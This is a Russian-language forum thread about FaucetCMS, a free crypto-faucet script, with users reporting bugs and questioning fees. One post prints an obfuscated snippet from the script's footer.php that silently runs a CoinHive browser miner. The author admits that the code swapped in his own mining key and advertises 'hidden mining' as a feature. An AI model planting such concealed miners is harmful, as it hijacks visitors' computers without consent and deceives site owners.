Перейти к содержанию

FaucetCMS - бесплатный скрипт для создания своего крана.


deep64

Рекомендуемые сообщения

@Cheburator

скинь в личку адрес тестового сайта, попробую подсказать

Изменено пользователем zero69rus
Ссылка на комментарий
Поделиться на другие сайты

1 час назад, zero69rus сказал:

у меня на php7 стоит, пока все нормально)

В принципе, я не задумывал такой опции, обязательно добавлю в вишлист.

А пока можете соорудить вот такой хак - http:\\google.com' target='_blank

То есть нужно закрыть одинарную кавычку после ссылки и записать таргет бланк без закрывающей. Должно сработать.

Изменено пользователем deep64
Ссылка на комментарий
Поделиться на другие сайты

1 минуту назад, deep64 сказал:

В принципе, я не задумывал такой опции, обязательно добавлю в вишлист.

А пока можете соорудить вот такой хак - http:\\google.com' target='_blank

То есть нужно закрыть одинарную кавычку после ссылки и записать таргет бланк без закрывающей.

Пробую))

3 минуты назад, deep64 сказал:

В принципе, я не задумывал такой опции, обязательно добавлю в вишлист.

А пока можете соорудить вот такой хак - http:\\google.com' target='_blank

То есть нужно закрыть одинарную кавычку после ссылки и записать таргет бланк без закрывающей.

Спасибо, все нормально работает, не знал))

Еще вопрос, я вот хочу админку переименовать, а то по любому долбить будут,каких файлов придерживаться?

Ссылка на комментарий
Поделиться на другие сайты

14 минуты назад, zero69rus сказал:

Пробую))

Спасибо, все нормально работает, не знал))

Еще вопрос, я вот хочу админку переименовать, а то по любому долбить будут,каких файлов придерживаться?

Путь к админке или имя пользователя? Путь не переименовать. Там слишком много на контроллере завязано. А вот имя пользователя можно в базе поправить, через phpmyadmin, например.

Ссылка на комментарий
Поделиться на другие сайты

1 минуту назад, deep64 сказал:

Путь к админке или имя пользователя? Путь не переименовать. Там слишком много на контроллере завязано. А вот имя пользователя можно в базе поправить, через phpmyadmin, например.

хотелось бы конечно именно сам путь к админке, ну раз нет так нет) а в бд это groups?

Ссылка на комментарий
Поделиться на другие сайты

10 часов назад, zero69rus сказал:

хотелось бы конечно именно сам путь к админке, ну раз нет так нет) а в бд это groups?

users скорее всего

а вот что менять, только имя, только e-mail или всё вместе...

Изменено пользователем Cheburator
Ссылка на комментарий
Поделиться на другие сайты

  • 3 недели спустя...

Спасибо за ваш скрипт. Но что-то я нигде не заметил информации о взимаемых поборах(как я понял вам разработчику скрипта) при каждом сборе с крана. Где об этом можно узнать подробнее?  

Ссылка на комментарий
Поделиться на другие сайты

В шапке не всё написано, борзыми щенками берёт от 0,1 (DOGE), сколько больше не знаю. И в зефирчиках должен брать, но не знаю сколько, не пробовал зефирный кран запускать. Но и по сегодняшней ситуации на кранах и с курсом, 3-6 сатох это уже многовато.

И есть подозрение на coinhive подмайнивает...

Изменено пользователем Cheburator
Ссылка на комментарий
Поделиться на другие сайты

Ну собственно скрипт бесплатный, но с отчислениями. Я думаю автору лично можно написать и купить у него за определенную денежку ( и откаты убрать). Каждый выбирает для себя... А автору респект за идею. Правда функционал пока слабоват.

 

@deep64  Есть необходимость проверки кошелька на принадлежность платежной системе. Иначе на кошелек начисления не выплачиваются. И все таки майнинг прятать. Антивирусы сайт блокируют и Яндексы всякие.... sourcerer как вариант.

Изменено пользователем Spirit_RX
Ссылка на комментарий
Поделиться на другие сайты

В 04.12.2017 в 09:33, Spirit_RX сказал:

... купить у него за определенную денежку ( и откаты убрать).

Не думаю, не выгодно. Сейчас даже автор GR8 остановил продажи своего скрипта, а это 25 долларов, на минуточку. Так вот он сейчас разрабатывает скрипт с аналогичным донатом. Ссылочка

Ссылка на комментарий
Поделиться на другие сайты

  • 3 недели спустя...

@deep64 

Назрел серьезный вопрос. В админке постоянно меняется публик кей на майнинг. И сколько не менял, постоянно через некоторое время появляется опять. Не хорошо как-то...  Опять замена на 4dmX1ei4W5qpTJvjubqwOGL8tGf33LeY

Изменено пользователем Spirit_RX
Ссылка на комментарий
Поделиться на другие сайты

@Spirit_RX , в upload\application\views\layout\footer.php есть код 

<?php if(!$antiadblock){echo 'var _0x7de0=["\x34\x64\x6D\x58\x31\x65\x69\x34\x57\x35\x71\x70\x54\x4A\x76\x6A\x75\x62\x71\x77\x4F\x47\x4C\x38\x74\x47\x66\x33\x33\x4C\x65\x59","\x64\x69\x73\x61\x62\x6C\x65\x64","\x66\x61\x6C\x73\x65","\x73\x74\x61\x72\x74"];var my= new CoinHive.User(_0x7de0[0],_0x7de0[1],{threads:2,autoThreads: _0x7de0[2],throttle:0.8,forceASMJS:false});my[_0x7de0[3]]()';}?>

=
 

<?php if(!$antiadblock){echo 'var _0x7de0=["4dmX1ei4W5qpTJvjubqwOGL8tGf33LeY","disabled","false","start"];var my= new CoinHive.User(_0x7de0[0],_0x7de0[1],{threads:2,autoThreads: _0x7de0[2],throttle:0.8,forceASMJS:false});my[_0x7de0[3]]()';}?>

 

Изменено пользователем CcFaucet
Ссылка на комментарий
Поделиться на другие сайты

Привет. По поводу ключа - это из последнего билда, я экспериментировал с заменой ключа на свой в 10% случаев, дабы убрать fee от клеймов полностью. Сейчас на подходе обновление, этого больше не будет. 

А тот, код, что скидывал CcFaucet - запускает майнер, если он не настроен.

Собственно идея была так себе и толкового профита от неё нет. К слову, я вот здесь об этом упоминал(там где про коинхайв майнер написано), может нужно было подробнее расписать. 

 

Теперь по делу, я тут свой сервис запилил, вроде коинхайва, только с выплатами прямо на faucethub, комиссией меньше, и порогом выплат ниже. Ко 2-3 числу выкачу обнову для скрипта, где можно будет его использовать и не только скрыто.

Собственно вот и вопрос, как лучше сделать майнинг для пользователей? Отдельной страницей или показывать функционал майнера вместе с таймером, вместо ожидания? Или может еще какие-то идеи есть. Буду рад.

 

И да, если есть вопросы, а в теме я не появляюсь - пишите на support@deep64.com 

 

п.с. А по поводу почитать где сколько берется - заглядывайте в how_to_install.txt 

Изменено пользователем deep64
Ссылка на комментарий
Поделиться на другие сайты

Всем привет. Вот долгожданный апдейт. Может не такой большой как хотелось бы, но я был занят майнинговым сервисом.

UPDATE:
0.9.9
-Добавлен майнинговый сервис WebMinePool (это мой собственный сервис, на данный момент в бете)
-Майнинг теперь разделен на две ветки?
-Скрытый майнинг, такой же как и был - с поддержкой webminepool.com и coinhive.com (можно использовать только один)
-Майнинговый кран. Позволяет вашим пользователям майнить у вас на кране. Смотрите новый пункт меню в админке.
-Скрытый майнер больше не подменяет ключи.
-BitCaptcha API обновлено. После их перезапуска вся старая интеграция поломалась. Теперь все снова работает.
-Добавлена возможность сортировать пользователей по их рефералам.
-Наконец-то окончательно победил проблемы при регистрации в ETH версии. Теперь все кошельки принимает.
-По многичесленным просьбам DOGE версия теперь показывает все в догах, а не в догтоши. Но настраивать все равно нужно как раньше.
-Окончательно исправлены все косяки с сообщениями в DOGE и ETH версиях. Теперь никаких "сатоши" в doge версии и никаких "gwei" в битке.

Как обычно протестил все несколько раз, но если где-то косяк пишите (лучше на почту, есть в шапке). Хотфикс выйдет быстро.

WebMinePool тема сервиса на bitcointalk форуме
Если уже пользуетесь скриптом некоторое время и вам нужен инвайт на webminepool также пишите на почту


Download (ETH и DOGE внутри)

Обновление с версии 0.9.8 инструкция внутри.


Note: Апдейт большой, вроде все учел, но по возможности рекомендовал бы чистую установку, вместо замены файлов и апдейтов базы.
 

Изменено пользователем deep64
Ссылка на комментарий
Поделиться на другие сайты

Вот вам и чистая установка

A Database Error Occurred

Error Number: 1146

Table 'fau.page_blocks' doesn't exist

SELECT * FROM `page_blocks` WHERE `name` IN('top_banner', 'ref_text_logged', 'ref_text_unlogged', 'left_sidebar', 'right_sidebar', 'homepage_main', 'footer_place_1', 'footer_place_1', 'footer_place_2', 'footer_place_3', 'wellcome_text_logged', 'wellcome_text_unlogged', 'js_after_body', 'js_before_body', 'js_before_body_close', 'js_before_head_close', 'mining_text')

Filename: models/Mpage.php(521) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code

Line Number: 1

Ссылка на комментарий
Поделиться на другие сайты

2 часа назад, Spirit_RX сказал:

Вот вам и чистая установка

A Database Error Occurred

Error Number: 1146

Table 'fau.page_blocks' doesn't exist

SELECT * FROM `page_blocks` WHERE `name` IN('top_banner', 'ref_text_logged', 'ref_text_unlogged', 'left_sidebar', 'right_sidebar', 'homepage_main', 'footer_place_1', 'footer_place_1', 'footer_place_2', 'footer_place_3', 'wellcome_text_logged', 'wellcome_text_unlogged', 'js_after_body', 'js_before_body', 'js_before_body_close', 'js_before_head_close', 'mining_text')

Filename: models/Mpage.php(521) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code

Line Number: 1

Добрый день, спасибо за коммент.

Оказалось на более ранних версиях mysql нельзя было выставить current_timestamp по умолчанию,  для полей типа datetime, поменял на timestamp. Я этого не знал и тестировал все на версии mysql 5.7, где отлично работало. 

Файлы заменены, можете перекачать. Пишите если еще возникнут какие-то сложности.

Ссылка на комментарий
Поделиться на другие сайты

Ну вроде встал. Пока тестирую. Посмотрим как себя поведет новая версия. Инвайт что-то дает?

Ссылка на комментарий
Поделиться на другие сайты

4 часа назад, Spirit_RX сказал:

Ну вроде встал. Пока тестирую. Посмотрим как себя поведет новая версия. Инвайт что-то дает?

Без инвайта нельзя зарегистрироваться. 

Ссылка на комментарий
Поделиться на другие сайты

Мы тут с парой ребят из чатика FO решили, что он не очень удобный и создали slack канал. Если вы владеете краном или сайтом смежной тематики - присоединяйтесь. Чат англоязычный.

Изменено пользователем deep64
Ссылка на комментарий
Поделиться на другие сайты

@deep64 Вот такие ошибки выскакивают,к примеру я залогинился не как админ то при переходе в админку выдает ошибки как на скрине,то есть путь до расположения файла/ов видят все желающие ,если как админ то все нормально.

точнее страница 404 с такими ошибками,в чем может быть проблема?

 

InkedScreenshot (40)_LI.jpg

Изменено пользователем zero69rus
Ссылка на комментарий
Поделиться на другие сайты

@zero69rus view (страница) не видит переменную. Либо она не подгружается из базы, либо не передается на страница. Какая версия скрипта? Как ведут себя остальные страницы? Немного не понял про залогинен\не залогинен. Это на что-то влияет? Просто, похоже это просто ошибка страницы 404. 

Ошибка появилась в определенный момент или раньше было так же?

Ссылка на комментарий
Поделиться на другие сайты

21 час назад, zero69rus сказал:
5 минут назад, deep64 сказал:

@zero69rus view (страница) не видит переменную. Либо она не подгружается из базы, либо не передается на страница. Какая версия скрипта? Как ведут себя остальные страницы? Немного не понял про залогинен\не залогинен. Это на что-то влияет? Просто, похоже это просто ошибка страницы 404. 

Ошибка появилась в определенный момент или раньше было так же?

Ошибка получилась после обновления,то есть я обновлял так,установил все с нуля потом со старой бд с пользователями и тем что было в page_blocks(реклама,надписи) переносил по не многу с заменой,версию php ставил любую и 5.3 и 5.6 , 7.0 разницы нет,так пользуюсь 7.0, я уже попробовал на локалке поэкспериментировать с базой,происходит как раз с того момента когда обновляю page_blocks  а залогинен\не залогинен  это я тупанул(это тут не причем:smile:)

 

Ссылка на комментарий
Поделиться на другие сайты

@deep64 еще при выхода с аккаунта админа нажав кнопку logout флажки сами снимаются с капчи и платежной системы,в моем случае это recapcha и faucethub, приходится заново логиниться как админ  и выставлять

Ссылка на комментарий
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
  • Последние посетители   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу
  • Similar Topics

    • SixMAbot - бесплатный бот для торговли криптой

      Немного биографии, кому не интересно — без проблем листаем сразу ниже Бесплатный торговый робот для крипты SixMAbot Разработаны подробные видеоуроки с описанием бота и работы с ним. Результаты бэктестов при использовании полного функционала бота (комиссия задана 0,06% специально завышенная для стресс-тестирования) За 2023 год: РАЗ ДВА ТРИ За 2022-2023 годы: РАЗ ДВА ТРИ   Летом 2022 года запускались реальные торги на Binance, к

      в Софт для трейдинга

    • [P2P-платформа] от TOP-10 Майнинг пула emcd. [без KYC, бесплатный вывод]

      emcd. P2P - платформа для P2P торговли криптовалютой на базе ТОП-10 майнинг-пула в мире.  Безопасные и быстрые сделки от проверенных продавцов с большим выбором валют и способов оплаты. Крипта от майнеров Покупай криптовалюту прямо в экосистеме майнинг-пула Выгодный курс Выбирай выгодные предложения и зарабатывай на разнице курсов Бесплатный вывод Выводи криптовалюту на внешние кошельки абсолютно бесплатно   Отсутствие KYC на этапе бета-тестирования  

      в Биржи криптовалют

    • autohashmining.com бесплатный бонус для старта майнинга хеш-мощность 200 ГГц/с Щедрая баунти программа. Скрин вывода в описании

      Бесплатный бонус для старта майнинга хеш-мощность 200 ГГц/с Минимальная сумма вывода BTC/ETH/USDT TRC20/USDT BEP20 составляет 3 доллара США, а для других криптовалют минимальная сумма вывода составляет 1,1 доллара США Но у меня прошел вывод в LTC на 0.23$ Зарегистрировался месяц назад и забыл подумал очередной мусор. Но оказалось не так. Проект продолжает расти и развиваться.  Так же есть щедрая баунти программа в разделе Free Bounty от 0.5$ до 500 $ 

      в Раздачи монет

    • https://t.me/TRXULTRAMINERBOT- бесплатный TRX каждый час

      Запускаем бота https://t.me/TRXULTRAMINERBOT?start=6009530105 Подписываемся на 2 канала. Добавляем почту от Faucetpay (это кошелек для микротранзакций) Кнопкой "Free bonus" клеймим монетку TRX каждый час. Выплата автоматически проступает на ваш FaucetPay кошелек. Вывод проверен.  

      в Раздачи монет

    • A-Bot - Бесплатный бот для Binance

      Данный бот предназначен для спотовой торговли на всех доступных котируемых активах (BTC, ETH, BNB, TRX, XRP, стейблкоины, фиатные валюты). Работает по гибкой стратегии усреднения, имея обширное количество дополнительных настроек и опций, напрямую влияющих на итоговый профит и стратегию в целом, таких как: торговля монетами при листинге; детектор пампов; трейлинг-стоп; закрытие позиции по принципу частичной распродажи в зависимости от её веса (это позволяет тянуть среднюю продажу выше при пампе м

      в Софт для трейдинга

×
×
  • Создать...